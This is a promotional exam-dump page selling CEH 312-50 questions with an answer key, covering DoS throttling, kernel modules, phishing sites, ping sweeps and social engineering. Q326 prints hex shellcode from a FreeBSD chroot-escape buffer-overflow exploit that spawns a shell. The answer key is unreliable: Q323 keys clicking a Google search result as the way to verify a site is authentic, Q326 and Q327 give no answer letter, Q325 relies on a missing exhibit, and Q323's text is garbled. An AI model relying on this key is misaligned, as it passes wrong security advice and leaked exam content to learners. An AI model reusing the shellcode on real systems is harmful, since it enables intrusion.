Act now and download your EC-Council 312-50 test today! Do not waste time for the worthless EC-Council 312-50 tutorials. Download Up to the immediate present EC-Council Ethical Hacking and Countermeasures (CEHv6) exam with real questions and answers and begin to learn EC-Council 312-50 with a classic professional.

2017 Apr 312-50 rapidshare

Q321. One of the effective DoS/DDoS countermeasures is 'Throttling'. Which statement correctly defines this term? 

A. Set up routers that access a server with logic to adjust incoming traffic to levels that will be safe for the server to process 

B. Providers can increase the bandwidth on critical connections to prevent them from going down in the event of an attack 

C. Replicating servers that can provide additional failsafe protection 

D. Load balance each server in a multiple-server architecture 

Answer: A


Q322. John is discussing security with Jane. Jane had mentioned to John earlier that she suspects an LKM has been installed on her server. She believes this is the reason that the server has been acting erratically lately. LKM stands for Loadable Kernel Module. 

What does this mean in the context of Linux Security? 

A. Loadable Kernel Modules are a mechanism for adding functionality to a file system without requiring a kernel recompilation. 

B. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel after it has been recompiled and the system rebooted. 

C. Loadable Kernel Modules are a mechanism for adding auditing to an operating-system kernel without requiring a kernel recompilation. 

D. Loadable Kernel Modules are a mechanism for adding functionality to an operating-system kernel without requiring a kernel recompilation. 

Answer: D

Explanation: Loadable Kernel Modules, or LKM, are object files that contain code to extend the running kernel, or so-called base kernel, without the need of a kernel recompilation. Operating systems other than Linux, such as BSD systems, also provide support for LKM's. However, the Linux kernel generally makes far greater and more versatile use of LKM's than other systems. LKM's are typically used to add support for new hardware, filesystems or for adding system calls. When the functionality provided by an LKM is no longer required, it can be unloaded, freeing memory. 


Q323. An Attacker creates a zuckerjournals.com website by copying and mirroring HACKERJOURNALS.COM site to spread the news that Hollywood actor Jason Jenkins died in a car accident. The attacker then submits his fake site for indexing in major search engines. When users search for "Jason Jenkins", attacker's fake site shows up and dupes victims by the fake news. 

This is another great example that some people do not know what URL's are. Real website: Fake website: http://www.zuckerjournals.com 

The website is clearly not WWW.HACKERJOURNALS.COM. It is obvious for many, but unfortunately some people still do not know what an URL is. It's the address that you enter into the address bar at the top your browser and this is clearly not legit site, its www.zuckerjournals.com 

How would you verify if a website is authentic or not? 

A. Visit the site using secure HTTPS protocol and check the SSL certificate for authenticity 

B. Navigate to the site by visiting various blogs and forums for authentic links 

C. Enable Cache on your browser and lookout for error message warning on the screen 

D. Visit the site by clicking on a link from Google search engine 

Answer: D


Q324. Lauren is performing a network audit for her entire company. The entire network is comprised of around 500 computers. Lauren starts an ICMP ping sweep by sending one IP packet to the broadcast address of the network, but only receives responses from around five hosts. Why did this ping sweep only produce a few responses? 

A. Only Windows systems will reply to this scan. 

B. A switched network will not respond to packets sent to the broadcast address. 

C. Only Linux and Unix-like (Non-Windows) systems will reply to this scan. 

D. Only servers will reply to this scan. 

Answer: C


Q325. What type of session hijacking attack is shown in the exhibit? 

A. Session Sniffing Attack 

B. Cross-site scripting Attack 

C. SQL Injection Attack 

D. Token sniffing Attack 

Answer: A


Most up-to-date 312-50 test questions:

Q326. #define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8), 

(((x)&0xff0000)16), (((x)&0xff000000)24) 

char infin_loop[]= 

/* for testing purposes */ 

"\xEB\xFE"; 

char bsdcode[] = 

/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ 

"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" 

"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0" 

"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0" 

"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" 

"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" 

"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" 

"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd" 

"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" 

"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" 

"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53" 

"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30" 

"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" 

"\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; 

static char *magic_str=NULL; 

int before_len=0; 

char *target=NULL, *username="user", *password=NULL; 

struct targets getit; 

The following exploit code is extracted from what kind of attack? 

A. Remote password cracking attack 

B. SQL Injection 

C. Distributed Denial of Service 

D. Cross Site Scripting 

E. Buffer Overflow 

Answer:

Explanation: This is a buffer overflow with it’s payload in hex format. 


Q327. What is the name of the software tool used to crack a single account on Netware Servers using a dictionary attack? 

A. NPWCrack 

B. NWPCrack 

C. NovCrack 

D. CrackNov 

E. GetCrack 

Answer:

Explanation: NWPCrack is the software tool used to crack single accounts on Netware servers. 


Q328. Jack Hackers wants to break into Brown’s Computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co. pretending to be an administrator from Brown Co. Jack tell Jane that there has been a problem with some accounts and asks her to verify her password with him “just to double check our records”. Jane does not suspect anything amiss and parts her password. Jack can now access Brown Co.’s computer with a valid username and password to steal the cookie recipe. What kind of attack is being illustrated here? 

A. Faking Identity 

B. Spoofing Identity 

C. Social Engineering 

D. Reverse Psychology 

E. Reverse Engineering 

Answer: C

Explanation: Social engineering is a collection of techniques used to manipulate people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery for information gathering or computer system access and in most cases the attacker never comes face-to-face with the victim. 


Q329. What is the command used to create a binary log file using tcpdump? 

A. tcpdump -r log 

B. tcpdump -w ./log 

C. tcpdump -vde -r log 

D. tcpdump -l /var/log/ 

Answer: B

Explanation: tcpdump [ -adeflnNOpqStvx ] [ -c count ] [ -F file ] [ -i interface ] [ -r file ] [ -s snaplen ] [ -T type ] [ -w file ] [ expression ] 

-w Write the raw packets to file rather than parsing and printing them out. 


Q330. TCP SYN Flood attack uses the three-way handshake mechanism. 

1. An attacker at system A sends a SYN packet to victim at system B. 

2. System B sends a SYN/ACK packet to victim A. 

3. As a normal three-way handshake mechanism system A should send an ACK packet to system B, however, system A does not send an ACK packet to system B. In this case client B is waiting for an ACK packet from client A. 

This status of client B is called _________________ 

A. "half-closed" 

B. "half open" 

C. "full-open" 

D. "xmas-open" 

Answer: B